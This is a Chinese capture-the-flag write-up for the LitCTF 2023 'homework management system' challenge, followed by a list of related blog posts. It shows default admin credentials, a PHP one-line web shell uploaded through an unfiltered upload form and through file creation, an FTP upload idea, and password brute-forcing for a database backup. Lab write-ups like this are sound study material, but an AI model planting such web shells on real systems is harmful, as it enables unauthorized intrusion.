[LitCTF 2023]作业管理系统

LitCTF 2023作业管理系统

信息搜集

进来发现要登录:

但是别着急,先查看源码或者抓个包:

可以看到源码中给出了提示:默认账户admin admin 。

账户名:admin,密码:admin,成功登录。

注入点

本题的注入点很多,进入页面,首先就能看到一个上传文件和创建文件:

注入点一:文件上传

上传一个名为 eval.php 的文件,文件内容为:

复制代码
BM
<?php @eval($_POST['shell']);?>

发现没有做任何过滤,直接上传成功了:

蚁剑直接连:

最后在根目录下找到 flag 。

注入点二:创建文件直接写马

文件名:shell.php

创建文件后选择编辑文件,写入一句话木马并保存:

蚁剑直接连:

注入点三:ftp 远程文件上传

这个注入点只是理论上,因为本人没有实践过。

首先需要一台能被公网访问的服务器,搭建好 ftp 服务,注意做好安全防护,比如禁止匿名登录啥的。

然后在 FTP 地址一栏填入自己服务器的 IP ,端口为 21 。用户名和密码填入自己设置的 ftp 用户名和密码。

点击远程上传,理论上可以得到这个上传的 zip 文件,估计是源码。

(理论,勿喷,不当请指出)

注入点四:获取数据库备份文件

这个也是理论上可行,但是可能是因为环境问题而报错了,所以最后讲。

将想要获取的数据库名称写上去,然后下面来个万能密码或者弱密码爆破(假设能成功的话进入下一步)。

点击备份,然后在网站根目录访问 mysql.zip 就可以下载了。

但是我这里在点击备份的时候报错:

所以没办法下一步了。

相关推荐
菩提小狗11 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
Rocket-Luo12 小时前
谈谈企业中的网络安全
网络·安全·web安全
中云DDoS CC防护蔡蔡12 小时前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
技术不好的崎鸣同学12 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
Bruce_Liuxiaowei14 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
菩提小狗16 小时前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
忡黑梨16 小时前
安装 Claude Code(使用 DeepSeek API)
网络·网络安全
HackTwoHub19 小时前
企业级开源安全利器,整合漏洞管理、基线检查,威胁狩猎、情报联动,适配政企服务器安全运维
运维·服务器·人工智能·安全·web安全·开源·自动化
treesforest18 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
零零信安18 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安